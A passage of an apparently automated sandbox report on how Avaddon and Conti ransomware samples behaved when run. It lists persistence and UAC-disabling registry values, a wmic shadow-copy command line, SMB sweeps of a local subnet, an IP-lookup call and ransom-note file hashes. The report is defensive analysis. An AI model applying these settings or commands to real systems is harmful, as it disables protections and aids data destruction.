| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\AppData\\Roaming\\Avaddon_09_06_2020_1054KB.exe" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | \??\Z:\$RECYCLE.BIN\S-1-5-21-2480455240-981575606-1030659066-1000\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
Enumerates connected drives
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe"
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 172.67.75.163:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| GB | 184.26.45.61:80 | x2.c.lencr.org | tcp |
| US | 8.8.8.8:53 | 163.75.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.45.26.184.in-addr.arpa | udp |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.0.1:139 | tcp | |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| N/A | 10.127.0.2:445 | tcp | |
| N/A | 10.127.0.2:139 | tcp | |
| US | 8.8.8.8:53 | 2.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| N/A | 10.127.0.3:445 | tcp | |
| N/A | 10.127.0.3:139 | tcp | |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.4:445 | tcp | |
| N/A | 10.127.0.4:139 | tcp | |
| US | 8.8.8.8:53 | 4.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.5:445 | tcp | |
| N/A | 10.127.0.5:139 | tcp | |
| US | 8.8.8.8:53 | 5.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.6:445 | tcp | |
| N/A | 10.127.0.6:139 | tcp | |
| US | 8.8.8.8:53 | 6.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.7:445 | tcp | |
| N/A | 10.127.0.7:139 | tcp | |
| US | 8.8.8.8:53 | 7.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.8:445 | tcp | |
| N/A | 10.127.0.8:139 | tcp | |
| US | 8.8.8.8:53 | 8.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.0.9:139 | tcp | |
| US | 8.8.8.8:53 | 9.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.10:445 | tcp | |
| N/A | 10.127.0.10:139 | tcp | |
| US | 8.8.8.8:53 | 10.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.0.11:139 | tcp | |
| US | 8.8.8.8:53 | 11.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.0.12:139 | tcp | |
| US | 8.8.8.8:53 | 213.80.50.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.13:445 | tcp | |
| N/A | 10.127.0.13:139 | tcp | |
| US | 8.8.8.8:53 | 13.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.0.14:139 | tcp | |
| US | 8.8.8.8:53 | 14.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.15:445 | tcp | |
| N/A | 10.127.0.15:139 | tcp | |
| US | 8.8.8.8:53 | 15.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.0.16:139 | tcp | |
| US | 8.8.8.8:53 | 16.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.17:445 | tcp | |
| N/A | 10.127.0.17:139 | tcp | |
| US | 8.8.8.8:53 | 17.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.18:445 | tcp | |
| N/A | 10.127.0.18:139 | tcp | |
| US | 8.8.8.8:53 | 18.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.0.19:139 | tcp | |
| US | 8.8.8.8:53 | 19.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.20:445 | tcp | |
| N/A | 10.127.0.20:139 | tcp | |
| US | 8.8.8.8:53 | 20.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.0.21:139 | tcp | |
| US | 8.8.8.8:53 | 21.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.22:445 | tcp | |
| N/A | 10.127.0.22:139 | tcp | |
| US | 8.8.8.8:53 | 22.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.23:445 | tcp | |
| N/A | 10.127.0.23:139 | tcp | |
| US | 8.8.8.8:53 | 23.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.24:445 | tcp | |
| N/A | 10.127.0.24:139 | tcp | |
| US | 8.8.8.8:53 | 24.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.0.25:139 | tcp | |
| US | 8.8.8.8:53 | 25.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.0.26:139 | tcp | |
| US | 8.8.8.8:53 | 26.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.27:445 | tcp | |
| N/A | 10.127.0.27:139 | tcp | |
| US | 8.8.8.8:53 | 27.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.0.28:139 | tcp | |
| US | 8.8.8.8:53 | 28.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.29:445 | tcp | |
| N/A | 10.127.0.29:139 | tcp | |
| US | 8.8.8.8:53 | 29.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.30:445 | tcp | |
| N/A | 10.127.0.30:139 | tcp | |
| US | 8.8.8.8:53 | 30.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.0.31:139 | tcp | |
| US | 8.8.8.8:53 | 31.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.32:445 | tcp | |
| N/A | 10.127.0.32:139 | tcp | |
| US | 8.8.8.8:53 | 32.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.33:445 | tcp | |
| N/A | 10.127.0.33:139 | tcp | |
| US | 8.8.8.8:53 | 33.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.0.34:139 | tcp | |
| US | 8.8.8.8:53 | 34.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.0.35:139 | tcp | |
| US | 8.8.8.8:53 | 35.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.0.36:139 | tcp | |
| US | 8.8.8.8:53 | 36.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.37:445 | tcp | |
| N/A | 10.127.0.37:139 | tcp | |
| US | 8.8.8.8:53 | 37.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.38:445 | tcp | |
| N/A | 10.127.0.38:139 | tcp | |
| US | 8.8.8.8:53 | 38.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.39:445 | tcp | |
| N/A | 10.127.0.39:139 | tcp | |
| US | 8.8.8.8:53 | 39.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.40:445 | tcp | |
| N/A | 10.127.0.40:139 | tcp | |
| US | 8.8.8.8:53 | 40.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.41:445 | tcp | |
| N/A | 10.127.0.41:139 | tcp | |
| US | 8.8.8.8:53 | 41.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.42:445 | tcp | |
| N/A | 10.127.0.42:139 | tcp | |
| US | 8.8.8.8:53 | 42.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.43:445 | tcp | |
| N/A | 10.127.0.43:139 | tcp | |
| US | 8.8.8.8:53 | 43.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.44:445 | tcp | |
| N/A | 10.127.0.44:139 | tcp | |
| US | 8.8.8.8:53 | 44.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.45:445 | tcp | |
| N/A | 10.127.0.45:139 | tcp | |
| US | 8.8.8.8:53 | 45.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.46:445 | tcp | |
| N/A | 10.127.0.46:139 | tcp | |
| US | 8.8.8.8:53 | 46.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.47:445 | tcp | |
| N/A | 10.127.0.47:139 | tcp | |
| US | 8.8.8.8:53 | 47.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.48:445 | tcp | |
| N/A | 10.127.0.48:139 | tcp | |
| US | 8.8.8.8:53 | 48.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.49:445 | tcp | |
| N/A | 10.127.0.49:139 | tcp | |
| US | 8.8.8.8:53 | 49.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.50:445 | tcp | |
| N/A | 10.127.0.50:139 | tcp | |
| US | 8.8.8.8:53 | 50.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.51:445 | tcp | |
| N/A | 10.127.0.51:139 | tcp | |
| US | 8.8.8.8:53 | 51.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.52:445 | tcp | |
| N/A | 10.127.0.52:139 | tcp | |
| US | 8.8.8.8:53 | 52.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.53:445 | tcp | |
| N/A | 10.127.0.53:139 | tcp | |
| US | 8.8.8.8:53 | 53.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.54:445 | tcp | |
| N/A | 10.127.0.54:139 | tcp | |
| US | 8.8.8.8:53 | 54.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.55:445 | tcp | |
| N/A | 10.127.0.55:139 | tcp | |
| US | 8.8.8.8:53 | 55.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.56:445 | tcp | |
| N/A | 10.127.0.56:139 | tcp | |
| US | 8.8.8.8:53 | 56.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.57:445 | tcp | |
| N/A | 10.127.0.57:139 | tcp | |
| US | 8.8.8.8:53 | 57.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.58:445 | tcp | |
| N/A | 10.127.0.58:139 | tcp | |
| US | 8.8.8.8:53 | 58.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.59:445 | tcp | |
| N/A | 10.127.0.59:139 | tcp | |
| US | 8.8.8.8:53 | 59.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.60:445 | tcp | |
| N/A | 10.127.0.60:139 | tcp | |
| US | 8.8.8.8:53 | 60.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.61:445 | tcp | |
| N/A | 10.127.0.61:139 | tcp | |
| US | 8.8.8.8:53 | 61.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.62:445 | tcp | |
| N/A | 10.127.0.62:139 | tcp | |
| US | 8.8.8.8:53 | 62.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.63:445 | tcp | |
| N/A | 10.127.0.63:139 | tcp | |
| US | 8.8.8.8:53 | 63.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.64:445 | tcp | |
| N/A | 10.127.0.64:139 | tcp | |
| US | 8.8.8.8:53 | 64.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.65:445 | tcp | |
| N/A | 10.127.0.65:139 | tcp |
Files
C:\Users\Admin\Desktop\032422-readme.html
| MD5 | 57fa8637b235e5993918ef1bea17705e |
| SHA1 | 7afae622daff5fd49e890478a0f2c78c61f35576 |
| SHA256 | dea9c5e92641b2ee485d347aef2127c2fcefb9a86e46708cdc71f601fa6b32db |
| SHA512 | 98d659189d050257228ded2471cf1bf62c396f1a5d7f273ac64632eec2e019c4ac8a212cd1fc77e1b8de93b085c18670ea06b199ba36a98f3b5bcfdbab926bb9 |
Analysis: behavioral13
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win7-20240705-en
Max time kernel
1563s
Max time network
1572s
Command Line
Signatures
Conti Ransomware
Renames multiple (7995) files with added filename extension
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\R3ADM3.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
Reads user/profile data of web browsers
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Microsoft Games\Chess\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\FreeCell\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\G2KVEH0D\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\Links for United States\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Mahjong\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Saved Games\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Music\Sample Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Recorded TV\Sample Media\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\7JXML4U5\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Hearts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Solitaire\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Contacts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Searches\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Libraries\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Pictures\Sample Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Videos\Sample Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\CNQY6MQU\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Public\Recorded TV\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Purble Place\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\72EHROQQ\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
